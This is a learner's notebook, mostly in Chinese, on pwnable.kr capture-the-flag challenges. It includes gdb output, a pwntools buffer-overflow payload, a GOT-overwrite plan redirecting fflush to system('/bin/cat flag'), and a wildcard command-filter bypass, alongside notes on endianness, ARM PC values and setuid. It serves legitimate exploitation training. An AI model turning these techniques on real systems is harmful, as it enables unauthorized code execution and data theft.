pwnable.kr (1)
pwnable.kr (1)
命令
函数调用栈的查看
backtrace:查看函数调用的顺序(函数调用栈的信息)
frame N:切换到栈编号为N的上下文中
info frame:查看当前函数调用的栈帧信息
“disassemble /r”命令可以用16进制形式显示程序的原始机器码
disass /r ‘fflush@plt’
echo $PATH
pwntools
32位, p32() 可以让我们转换整数到小端序格式
c.sendline(b"AAAA"*13+p32(0xcafebabe))加个b,不然是str格式,即utf-8,编码不一样
bytes字节符,打印以b开头
┌─[zentreisender@parrotos]─[~/Documents/pwnable.kr/BOF]
└──╼ $python3 exploit.py
[+] Opening connection to pwnable.kr on port 9000: Done
[*] Switching to interactive mode
$ id
uid=1008(bof) gid=1008(bof) groups=1008(bof)id 命令
带参运行
shell=ssh(‘col’,’pwnable.kr’, port=2222 ,password=’guest’)
p=shell.process(argv=[‘./col’,data_final]) #带参运行
ssh 链接也可以用process()
fd
当程序打开一个现有文件或者创建一个新文件时,内核向进程返回一个文件描述符。
每个Unix进程(除了可能的守护进程)应均有三个标准的POSIX文件描述符,对应于三个标准流
strcmp()
0 the contents of both strings are equal
0 Standard input STDIN_FILENO stdin
1 Standard output STDOUT_FILENO stdout
2 Standard error STDERR_FILENO stderrflag
做的少了,拿着文件单步运行了半天,又是strace , ltrace ,想看出些名堂,后来偶然看到upx字符串,就想不是win才有upx压缩,最后放弃;一搜wp才发现linux底下,upx -d 就行。
断点到leave, 然后
peda:x/s malloc地址就得到flag
passcode
got 表项覆盖
https://medium.com/@andrew-bae/pwnable-kr-passcode-writeup-2fdfd9fec283
栈溢出,scanf(%100, name)
0x804862f <welcome+38>: lea edx,[ebp-0x70]0x70=112 至少116个字符溢出到返回地址,name总共一百,所以溢出name不行
[24] .data PROGBITS 0804a024 001024 000008 00 WA 0 0 4
我们直接在相应位置ebp-0x10, ebp-0xc放入想要的数字,但是scanf遇空格结束输入
gdb-peda$ print $ebp-0x70
$1 = (void *) 0xffe43ab8
0x804857c <login+24>: mov edx,DWORD PTR [ebp-0x10]
0x80485aa <login+70>: mov edx,DWORD PTR [ebp-0xc]
0x80485c5 <login+97>: cmp DWORD PTR [ebp-0x10],0x528e6
0x80485ce <login+106>: cmp DWORD PTR [ebp-0xc],0xcc07c90x70-xc =100 刚好溢出不到
scanf()函数接收输入数据时,遇以下情况结束一个数据的输入:
① 遇空格、“回车”、“跳格”键。
② 遇宽度结束。
③ 遇非法输入。
Partial RELRO(The GOT table can be overwritten)
So, if I overwrite fflush@got.plt address as system(“/bin/cat flag”); address, this binary will execute system(“/bin/cat flag”); after scanf .
小端序研究
objdump -R ./passcode
0804a004 R_386_JUMP_SLOT fflush@GLIBC_2.0
plt 表项
8048430: ff 25 04 a0 04 08 jmp *0x804a004
命令中地址倒序,即小端序
got 表中地址也是倒序,即小端序
0x804a00c <puts@got.plt>: 0xf7597ca0
0x804a00c <puts@got.plt>: 0xa0 0x7c 0x59 0xf7
栈中地址也是小端序
0000| 0xffb30e38 --> 0xffb30e58
gdb-peda$ x/4bx $esp
0xffb30e38: 0x58 0x0e 0xb3 0xff
只是存储方式是小端序,读出来还是原本的顺序
payload += p32(0x0804a004)所以我们小端序写入栈中,执行地址没有小端序,why?
输入12345678 = 0xBC 614E
gdb-peda$ x/4bx $ebp-0xc
0xffffcf4c: 0x4e 0x61 0xbc 0x00
栈中是小端序
输入的是单字节还是顺序存储,多字节如int,都是小端序将fflush的got中的地址改为system的地址,这个地址不是libc库中的地址,而是代码段中的地址,即可以是任意可执行地址, 例如0x080485ea,但还要传参数,所以要提前一些:
0x080485e3 <+127>: mov DWORD PTR [esp],0x80487af
0x080485ea <+134>: call 0x8048460 <system@plt>
0x080485ef <+139>: leave
0x080485f0 <+140>: ret 0x80487af 字符串参数
0x080485ea <+134>: call 0x8048460 <system@plt>
代码:
https://github.com/Finsenty54/attack-code/blob/master/pwnable.kr/passcode.py
rondom
简单,rand() 不是true rondom
leg
arm
https://www.cnblogs.com/ichunqiu/p/9056630.html
在执行add r0, r1, #5指令时,第二条指令正在译码阶段,而第三条指令正在取指阶段。在执行第一条指令时,PC寄存器应指向第三条指令。也即,当处理器为三级流水线结构时,PC寄存器总是指向随后的第三条指令。
当处理器处于ARM状态时,每条ARM指令为4个字节,所以PC寄存器的值为当前指令地址 + 8字节
当处理器处于Thumb状态时,每条Thumb指令为2字节,所以PC寄存器的值为当前指令地址 + 4字节
/* key1
0x00008cdc <+8>: mov r3, pc
0x00008ce0 <+12>: mov r0, r3
pc=0x8ce4
r4=pc
key2
取pc值的时候应该还在arm状态
pc=0x00008d0c
key3
lr 返回地址=0x00008d80
将三个pc值加在一起 等于输入进的 k
*/服务器好像down了
直接给falg:My daddy has a lot of ARMv5te muscle!
mistake
fd=open(“/home/mistake/password”,O_RDONLY,0400) < 0
比较运算符高于赋值运算符
shellshock
https://linux.die.net/man/7/credentials
https://en.wikipedia.org/wiki/User_identifier
各user id
Effective user ID and effective group ID. These IDs are used by the kernel to determine the permissions that the process will have when accessing shared resources such as message queues, shared memory, and semaphores.On most UNIX systems, these IDs also determine the permissions when accessing files.
obtain its effective user (group) ID using geteuid(2) (getegid(2)).
Saved set-user-ID and saved set-group-ID. These IDs are used in set-user-ID and set-group-ID programs to save a copy of the corresponding effective IDs that were set when the program was executed (see execve(2)).
A set-user-ID program can assume and drop privileges by switching its effective user ID back and forth between the values in its real user ID and saved set-user-ID. This switching is done via calls to seteuid(2), setreuid(2), or setresuid(2).
比如ruid是普通用户,此时降权;suid是root,设置euid为suid后,提权
A process can obtain its saved set-user-ID (set-group-ID) using getresuid(2) (getresgid(2)).
Real user ID and real group ID. These IDs determine who owns the process. A process can obtain its real user (group) ID using getuid(2) (getgid(2)).
setuid属性,权限,即文件有+s
-r-xr-sr-x 1 root shellshock_pwn 8547 Oct 12 2014 shellshock
When the setuid or setgid attributes are set on an executable file, then any users able to execute the file will automatically execute the file with the privileges of the file’s owner (commonly root) and/or the file’s group, depending upon the flags set
chmod by setting the high-order octal digit to 4 for setuid or 2 for setgid. “chmod 6711 file” will set both the setuid and setgid bits (4+2=6), making the file read/write/executable for the owner (7), and executable by the group (first 1) and others (second 1). When a user other than the owner executes the file, the process will run with user and group permissions set upon it by its owner. For example, if the file is owned by user root and group wheel, it will run as root:wheel no matter who executes the file.
例子
4701 on an executable file owned by ‘root’ and the group ‘root’
A user named ‘thompson’ attempts to execute the file. The executable permission for all users is set (the ‘1’) so ‘thompson’ can execute the file. The file owner is ‘root’ and the SUID permission is set (the ‘4’) - so the file is executed as ‘root’.
本题权限
shellshock@pwnable:~$ stat -c “%a %A” shellshock
2555 -r-xr-sr-x
setgid bits
破壳(ShellShock)漏洞
https://www.freebuf.com/articles/system/45390.html
coin1
服务器上没有按pwntools,运行不起来,改成re+socket中不行,懒得弄了
cmd1
echo $PATH
PATH表明程序所在的目录,运行一个程序,不在当前文件夹中,会遍历PATH中的目录,寻找程序所在文件夹
cat 命令在/bin 下
该题,用到了linux通配符./cmd1 "/bin/cat fla*"